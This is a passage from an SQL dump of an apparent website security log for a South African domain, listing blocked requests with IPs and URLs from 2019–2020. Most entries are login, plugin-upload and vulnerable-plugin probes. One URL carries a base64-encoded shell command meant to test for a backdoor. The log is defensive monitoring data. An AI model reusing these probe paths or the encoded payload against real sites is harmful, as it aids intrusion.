13:45:59','154.223.133.108','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1651,'2019-11-08 13:48:42','154.223.133.108','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1652,'2019-11-08 13:54:05','178.130.75.130','https://smithandsmith.co.za/wp-login.php','404shield',''),(1653,'2019-11-08 14:17:50','154.223.133.108','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1654,'2019-11-08 14:45:24','154.223.133.108','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1655,'2019-11-08 14:53:17','154.223.133.108','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1656,'2019-11-08 14:55:49','154.223.133.108','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1657,'2019-11-08 14:58:30','134.35.243.173','https://smithandsmith.co.za/wp-login.php','404shield',''),(1658,'2019-11-08 16:05:23','183.89.112.195','https://smithandsmith.co.za/wp-login.php','404shield',''),(1659,'2019-11-08 16:24:26','183.89.112.195','https://smithandsmith.co.za/wp-login.php','404shield',''),(1660,'2019-11-08 16:56:49','154.223.133.108','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1661,'2019-11-08 17:04:42','154.223.133.108','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1662,'2019-11-08 22:37:18','82.78.189.130','http://smithandsmith.co.za/','sessionshield',''),(1663,'2019-11-09 15:57:54','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1664,'2019-11-09 16:16:24','128.234.77.237','http://smithandsmith.co.za/wp-login.php','404shield',''),(1665,'2019-11-10 03:46:10','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1666,'2019-11-10 03:46:12','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1667,'2019-11-10 03:46:14','77.120.176.171','http://smithandsmith.co.za/wp-login.php','404shield',''),(1668,'2019-11-10 22:59:27','82.78.189.130','http://smithandsmith.co.za/','muashield',''),(1669,'2019-11-10 22:59:48','82.78.189.130','http://smithandsmith.co.za/','muashield',''),(1670,'2019-11-10 22:59:49','82.78.189.130','http://smithandsmith.co.za/accesson2.php','muashield',''),(1671,'2019-11-11 12:20:01','103.87.143.143','http://smithandsmith.co.za/wp-login.php','404shield',''),(1672,'2019-11-12 16:26:32','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1673,'2019-11-12 22:23:03','82.78.189.130','http://smithandsmith.co.za/','sessionshield',''),(1674,'2019-11-13 19:10:31','82.79.59.75','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1675,'2019-11-13 22:18:42','31.202.101.40','http://smithandsmith.co.za/wp-login.php','404shield',''),(1676,'2019-11-14 11:56:08','45.136.108.44','http://smithandsmith.co.za/wp-content/plugins/super-socialat/super_socialat.php?d1=ZWNobyAibGFkeWdhZ2F5Ijs%3D','404shield',''),(1677,'2019-11-15 13:24:24','131.196.103.89','http://smithandsmith.co.za/wp-login.php','404shield',''),(1678,'2019-11-16 18:13:05','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1679,'2019-11-17 00:36:11','83.103.212.33','http://smithandsmith.co.za/','sessionshield',''),(1680,'2019-11-18 06:08:28','103.82.235.2','http://smithandsmith.co.za/wp-content/themes/satoshi/styles/functions.css','404shield',''),(1681,'2019-11-20 00:35:09','82.79.59.75','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1682,'2019-11-20 05:33:50','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1683,'2019-11-21 02:40:43','82.78.189.130','http://smithandsmith.co.za/','sessionshield',''),(1684,'2019-11-22 04:53:06','103.9.188.39','http://smithandsmith.co.za/wp-login.php','404shield',''),(1685,'2019-11-22 05:41:14','117.212.95.149','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1686,'2019-11-22 05:42:18','124.41.211.180','https://smithandsmith.co.za/wp-login.php','404shield',''),(1687,'2019-11-22 05:42:59','124.41.211.180','https://smithandsmith.co.za/wp-login.php','404shield',''),(1688,'2019-11-22 05:43:33','124.41.211.180','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1689,'2019-11-22 15:49:11','190.214.30.146','http://smithandsmith.co.za/wp-login.php','404shield',''),(1690,'2019-11-22 15:49:12','190.214.30.146','http://smithandsmith.co.za/wp-login.php','404shield',''),(1691,'2019-11-22 15:49:14','190.214.30.146','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1692,'2019-11-22 21:30:44','185.136.167.225','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(1693,'2019-11-23 05:16:03','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1694,'2019-11-23 10:24:07','62.210.157.10','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1695,'2019-11-24 01:24:10','62.210.157.10','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1696,'2019-11-24 19:46:16','157.245.197.92','http://smithandsmith.co.za/wp-login.php','404shield',''),(1697,'2019-11-24 19:46:19','157.245.197.92','http://smithandsmith.co.za/wp-login.php','404shield',''),(1698,'2019-11-24 19:46:24','157.245.197.92','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1699,'2019-11-24 19:47:06','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1700,'2019-11-24 19:49:05','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1701,'2019-11-24 19:56:21','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1702,'2019-11-24 19:59:11','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1703,'2019-11-24 20:04:32','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1704,'2019-11-24 20:05:22','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1705,'2019-11-24 20:05:48','118.96.56.158','https://smithandsmith.co.za/wp-login.php','404shield',''),(1706,'2019-11-24 20:05:49','118.96.56.158','https://smithandsmith.co.za/wp-login.php','404shield',''),(1707,'2019-11-24 20:05:51','118.96.56.158','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1708,'2019-11-24 20:07:07','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1709,'2019-11-24 20:07:56','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1710,'2019-11-26 03:31:28','83.103.212.33','http://smithandsmith.co.za/','sessionshield',''),(1711,'2019-11-27 02:37:45','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1712,'2019-11-27 06:39:31','192.99.15.139','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1713,'2019-11-27 06:40:11','192.99.15.139','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1714,'2019-11-27 06:40:37','118.174.205.222','https://smithandsmith.co.za/wp-login.php','404shield',''),(1715,'2019-11-27 06:40:38','118.174.205.222','https://smithandsmith.co.za/wp-login.php','404shield',''),(1716,'2019-11-27 06:40:40','118.174.205.222','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1717,'2019-11-27 06:41:44','124.122.161.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(1718,'2019-11-27 06:42:26','124.122.161.5','https://smithandsmith.co.za/wp-login.php','404shield',''),(1719,'2019-11-27 06:42:27','124.122.161.5','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1720,'2019-11-27 06:43:00','192.99.15.139','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1721,'2019-11-27 06:44:03','192.99.15.139','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1722,'2019-11-27 06:49:17','192.99.15.139','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1723,'2019-11-27 06:51:00','192.99.15.139','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1724,'2019-11-27 06:52:49','14.207.24.75','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1725,'2019-11-27 06:54:34','192.99.15.139','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1726,'2019-11-27 06:55:53','192.99.15.139','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1727,'2019-11-28 00:49:11','139.129.40.112','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(1728,'2019-11-28 15:21:37','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','404shield',''),(1729,'2019-11-30 01:23:43','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.css','404shield',''),(1730,'2019-12-01 05:26:15','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.css','404shield',''),(1731,'2019-12-01 06:59:52','83.103.212.33','http://smithandsmith.co.za/','sessionshield',''),(1732,'2019-12-02 04:40:18','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1733,'2019-12-03 05:13:32','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/mailcwp/mailcwp-upload.php','404shield',''),(1734,'2019-12-04 11:27:50','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1735,'2019-12-04 16:21:40','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1736,'2019-12-04 16:21:41','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1737,'2019-12-04 16:24:10','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1738,'2019-12-04 16:24:12','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1739,'2019-12-04 16:25:10','103.66.68.134','http://smithandsmith.co.za/wp-login.php','404shield',''),(1740,'2019-12-04 16:25:24','154.79.246.178','http://smithandsmith.co.za/wp-login.php','404shield',''),(1741,'2019-12-04 16:28:36','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1742,'2019-12-04 16:28:46','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1743,'2019-12-04 16:29:08','125.26.6.98','https://smithandsmith.co.za/wp-login.php','404shield',''),(1744,'2019-12-04 16:31:32','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1745,'2019-12-04 16:31:49','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1746,'2019-12-05 05:59:18','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','404shield',''),(1747,'2019-12-08 14:28:03','122.154.151.202','http://smithandsmith.co.za/wp-login.php','404shield',''),(1748,'2019-12-08 14:28:29','122.154.151.202','http://smithandsmith.co.za/wp-login.php','404shield',''),(1749,'2019-12-08 14:29:45','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1750,'2019-12-08 14:29:47','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1751,'2019-12-08 14:31:38','167.71.214.79','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1752,'2019-12-08 14:35:15','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1753,'2019-12-08 14:35:32','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1754,'2019-12-08 14:35:39','45.248.138.150','http://smithandsmith.co.za/wp-login.php','404shield',''),(1755,'2019-12-08 14:35:47','45.248.138.150','http://smithandsmith.co.za/wp-login.php','404shield',''),(1756,'2019-12-08 14:36:49','36.37.183.214','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1757,'2019-12-08 14:38:00','138.122.143.200','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1758,'2019-12-08 14:38:46','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1759,'2019-12-08 14:39:05','46.105.99.163','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1760,'2019-12-08 14:41:21','116.0.54.30','https://smithandsmith.co.za/wp-login.php','404shield',''),(1761,'2019-12-08 14:41:22','116.0.54.30','https://smithandsmith.co.za/wp-login.php','404shield',''),(1762,'2019-12-08 14:42:44','116.0.54.30','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1763,'2019-12-08 14:43:21','154.73.129.124','https://smithandsmith.co.za/wp-login.php','404shield',''),(1764,'2019-12-08 14:43:22','154.73.129.124','https://smithandsmith.co.za/wp-login.php','404shield',''),(1765,'2019-12-08 14:43:22','154.73.129.124','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1766,'2019-12-08 14:43:43','41.72.211.83','https://smithandsmith.co.za/wp-login.php','404shield',''),(1767,'2019-12-08 14:44:00','41.72.211.83','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1768,'2019-12-08 14:44:03','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1769,'2019-12-08 14:44:05','46.105.99.163','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1770,'2019-12-09 04:48:29','134.175.183.168','http://www.smithandsmith.co.za/wp-content/themes/sketch/404.php','404shield',''),(1771,'2019-12-09 20:59:04','192.99.15.15','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1772,'2019-12-09 21:11:56','192.99.15.15','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1773,'2019-12-10 17:31:11','82.78.189.130','http://smithandsmith.co.za/','sessionshield',''),(1774,'2019-12-13 09:25:54','82.78.189.130','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1775,'2019-12-13 21:37:40','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1776,'2019-12-14 22:34:51','31.202.101.40','http://www.smithandsmith.co.za/wp-login.php','404shield',''),(1777,'2019-12-15 00:47:39','83.103.212.33','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1778,'2019-12-16 11:14:13','157.230.162.226','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1779,'2019-12-16 11:14:41','61.8.78.130','http://smithandsmith.co.za/wp-login.php','404shield',''),(1780,'2019-12-16 11:16:03','198.27.81.94','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1781,'2019-12-16 11:16:03','198.27.81.94','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1782,'2019-12-16 11:19:00','198.27.81.94','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1783,'2019-12-16 11:19:01','198.27.81.94','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1784,'2019-12-16 11:19:36','138.197.162.125','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1785,'2019-12-16 11:20:20','198.27.81.94','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1786,'2019-12-16 11:20:29','198.27.81.94','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1787,'2019-12-16 11:21:30','169.255.234.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(1788,'2019-12-16 11:21:32','169.255.234.166','https://smithandsmith.co.za/wp-login.php','404shield',''),(1789,'2019-12-16 11:21:33','169.255.234.166','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1790,'2019-12-16 11:27:20','198.27.81.94','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1791,'2019-12-16 11:27:23','198.27.81.94','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1792,'2019-12-16 21:05:43','82.78.189.130','http://smithandsmith.co.za/','sessionshield',''),(1793,'2019-12-16 21:52:52','192.99.15.15','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1794,'2019-12-16 22:10:18','192.99.15.15','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1795,'2019-12-16 22:25:06','103.78.80.194','http://smithandsmith.co.za/wp-login.php','404shield',''),(1796,'2019-12-16 22:38:25','192.99.15.15','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1797,'2019-12-16 22:41:39','192.99.15.15','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1798,'2019-12-17 17:50:27','194.61.24.94','http://smithandsmith.co.za/wp-admin/admin-ajax.php?action=evpl_save_new_event','404shield',''),(1799,'2019-12-18 08:01:52','180.179.98.22','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1800,'2019-12-18 08:06:06','192.99.15.15','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1801,'2019-12-18 08:06:07','192.99.15.15','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1802,'2019-12-18 08:08:04','202.93.113.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(1803,'2019-12-18 08:08:06','202.93.113.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(1804,'2019-12-18 08:08:07','202.93.113.9','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1805,'2019-12-18 08:09:49','192.99.15.15','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1806,'2019-12-18 08:09:52','192.99.15.15','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1807,'2019-12-18 08:13:10','192.99.15.15','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1808,'2019-12-18 08:13:11','192.99.15.15','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1809,'2019-12-18 08:15:01','180.254.29.53','https://smithandsmith.co.za/wp-login.php','404shield',''),(1810,'2019-12-18 08:15:03','180.254.29.53','https://smithandsmith.co.za/wp-login.php','404shield',''),(1811,'2019-12-18 08:15:04','180.254.29.53','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1812,'2019-12-18 08:15:29','190.104.64.242','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1813,'2019-12-18 08:15:30','192.99.15.15','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1814,'2019-12-18 08:15:47','192.99.15.15','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1815,'2019-12-18 12:58:58','194.61.24.94','http://smithandsmith.co.za/wp-content/themes/wp-directory-update/style.css','404shield',''),(1816,'2019-12-20 09:47:05','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/CCSlider/includes/upload.php','404shield',''),(1817,'2019-12-20 17:53:18','194.61.24.94','http://smithandsmith.co.za/wp-content/plugins/wp-adcenter/delete.php?val=deluser&id=-1','404shield',''),(1818,'2019-12-21 10:30:31','82.77.172.62','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1819,'2019-12-21 19:27:32','103.82.235.2','http://smithandsmith.co.za/wp-content/themes/dp_evolve/js/back-end/libraries/fileuploader/upload_handler.php','404shield',''),(1820,'2019-12-22 15:56:30','82.78.189.130','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1821,'2019-12-24 10:50:24','46.105.99.163','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1822,'2019-12-24 10:50:24','46.105.99.163','http://smithandsmith.co.za/wp-admin/theme-editor.php','404shield',''),(1823,'2019-12-27 02:03:41','82.77.172.62','http://smithandsmith.co.za/index.php/component/users','sessionshield',''),(1824,'2019-12-28 15:44:09','103.82.235.2','http://smithandsmith.co.za/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library','404shield',''),(1825,'2019-12-30 14:39:17','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/radykal-fancy-gallery/admin/generate-code.php','404shield',''),(1826,'2019-12-31 00:39:08','198.27.80.123','http://smithandsmith.co.za/wp-admin/wplog.php','404shield',''),(1827,'2019-12-31 00:39:14','198.27.80.123','http://smithandsmith.co.za//wp-admin/wpconfigbak.php','404shield',''),(1828,'2019-12-31 00:40:46','198.27.80.123','https://smithandsmith.co.za/wp-admin/wplog.php','404shield',''),(1829,'2019-12-31 00:41:08','198.27.80.123','https://smithandsmith.co.za//wp-admin/wpconfigbak.php','404shield',''),(1830,'2020-01-01 22:49:13','185.136.163.107','http://www.smithandsmith.co.za//wp-admin/install.php','404shield',''),(1831,'2020-01-04 08:10:26','117.197.99.114','http://smithandsmith.co.za/wp-login.php','404shield',''),(1832,'2020-01-04 08:11:50','117.197.99.114','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1833,'2020-01-04 08:14:11','165.227.30.130','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1834,'2020-01-04 08:14:50','200.242.26.170','http://smithandsmith.co.za/wp-login.php','404shield',''),(1835,'2020-01-04 08:16:45','176.31.105.112','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1836,'2020-01-04 08:18:39','94.200.195.218','https://smithandsmith.co.za/wp-login.php','404shield',''),(1837,'2020-01-04 08:18:45','94.200.195.218','https://smithandsmith.co.za/wp-login.php','404shield',''),(1838,'2020-01-04 08:18:50','94.200.195.218','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1839,'2020-01-04 08:30:28','155.138.235.98','https://smithandsmith.co.za/wp-login.php','404shield',''),(1840,'2020-01-04 08:30:29','155.138.235.98','https://smithandsmith.co.za/wp-login.php','404shield',''),(1841,'2020-01-04 08:30:29','155.138.235.98','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1842,'2020-01-04 08:31:54','176.31.105.112','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1843,'2020-01-04 09:04:55','177.224.90.29','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1844,'2020-01-04 09:08:45','176.31.105.112','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1845,'2020-01-04 09:09:09','188.166.161.208','https://smithandsmith.co.za/wp-login.php','404shield',''),(1846,'2020-01-04 09:09:10','188.166.161.208','https://smithandsmith.co.za/wp-login.php','404shield',''),(1847,'2020-01-04 09:09:11','188.166.161.208','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1848,'2020-01-04 09:13:34','176.31.105.112','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1849,'2020-01-04 20:45:27','202.70.84.1','http://smithandsmith.co.za/wp-login.php','404shield',''),(1850,'2020-01-04 20:59:07','95.216.12.6','https://smithandsmith.co.za/wp-login.php','404shield',''),(1851,'2020-01-04 21:03:53','171.97.35.181','http://smithandsmith.co.za/wp-login.php','404shield',''),(1852,'2020-01-04 21:07:23','81.95.46.54','http://smithandsmith.co.za/wp-login.php','404shield',''),(1853,'2020-01-04 21:08:04','81.95.46.54','http://smithandsmith.co.za/wp-login.php','404shield',''),(1854,'2020-01-04 21:08:27','81.95.46.54','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1855,'2020-01-04 21:13:23','5.58.88.175','https://smithandsmith.co.za/wp-login.php','404shield',''),(1856,'2020-01-04 21:14:45','5.58.88.175','https://smithandsmith.co.za/wp-login.php','404shield',''),(1857,'2020-01-04 21:15:42','5.58.88.175','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1858,'2020-01-05 00:22:35','45.136.108.44','http://smithandsmith.co.za/wp-admin/admin-post.php?action=ToXML&Anno=Anno','404shield',''),(1859,'2020-01-05 17:21:55','174.138.55.111','https://smithandsmith.co.za/wp-login.php','404shield',''),(1860,'2020-01-05 17:22:07','174.138.55.111','https://smithandsmith.co.za/wp-login.php','404shield',''),(1861,'2020-01-05 17:23:03','157.245.53.36','https://smithandsmith.co.za/wp-login.php','404shield',''),(1862,'2020-01-05 17:24:00','157.245.53.36','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1863,'2020-01-05 17:25:10','83.13.164.202','http://smithandsmith.co.za/wp-login.php','404shield',''),(1864,'2020-01-06 10:31:03','82.78.189.130','http://smithandsmith.co.za/','muashield',''),(1865,'2020-01-06 10:31:04','82.78.189.130','http://smithandsmith.co.za/','muashield',''),(1866,'2020-01-06 10:31:25','82.78.189.130','http://smithandsmith.co.za/accesson2.php','muashield',''),(1867,'2020-01-06 12:58:47','185.29.9.186','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(1868,'2020-01-07 05:09:53','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/page-flip-image-gallery/upload.php','404shield',''),(1869,'2020-01-07 15:46:00','163.172.152.52','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1870,'2020-01-07 15:52:19','198.27.80.123','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1871,'2020-01-07 15:55:51','163.172.152.52','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1872,'2020-01-07 15:58:57','163.172.152.52','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1873,'2020-01-07 16:04:04','198.27.80.123','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1874,'2020-01-07 16:06:20','163.172.152.52','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1875,'2020-01-07 16:11:49','198.27.80.123','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1876,'2020-01-07 16:13:27','36.85.201.9','https://smithandsmith.co.za/wp-login.php','404shield',''),(1877,'2020-01-07 16:19:50','198.27.80.123','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1878,'2020-01-09 00:20:22','163.172.152.52','http://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1879,'2020-01-09 00:36:15','203.130.21.234','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1880,'2020-01-09 00:39:28','163.172.152.52','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1881,'2020-01-09 02:00:17','186.227.119.207','https://smithandsmith.co.za//wp-login.php','404shield',''),(1882,'2020-01-09 02:01:40','186.227.119.207','https://smithandsmith.co.za//wp-login.php','404shield',''),(1883,'2020-01-09 02:08:33','163.172.152.52','https://smithandsmith.co.za//wp-admin/plugin-install.php?tab=upload','404shield',''),(1884,'2020-01-09 02:13:03','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','404shield',''),(1885,'2020-01-11 01:41:14','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.css','404shield',''),(1886,'2020-01-12 20:42:03','75.73.50.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(1887,'2020-01-12 20:42:05','75.73.50.82','http://smithandsmith.co.za/wp-login.php','404shield',''),(1888,'2020-01-12 20:42:06','75.73.50.82','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1889,'2020-01-12 20:42:53','198.27.80.123','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1890,'2020-01-12 20:45:26','27.145.53.145','https://smithandsmith.co.za/wp-login.php','404shield',''),(1891,'2020-01-12 20:45:40','27.145.53.145','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1892,'2020-01-12 20:45:44','68.15.151.20','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1893,'2020-01-12 20:45:53','198.27.80.123','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1894,'2020-01-13 03:16:05','103.82.235.2','http://smithandsmith.co.za/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.css','404shield',''),(1895,'2020-01-13 09:09:05','83.206.128.205','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1896,'2020-01-13 09:09:16','182.23.54.146','http://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1897,'2020-01-13 09:16:04','91.216.66.70','http://smithandsmith.co.za/wp-login.php','404shield',''),(1898,'2020-01-13 09:18:04','182.23.54.146','https://smithandsmith.co.za/wp-admin/plugin-install.php?tab=upload','404shield',''),(1899,'2020-01-15 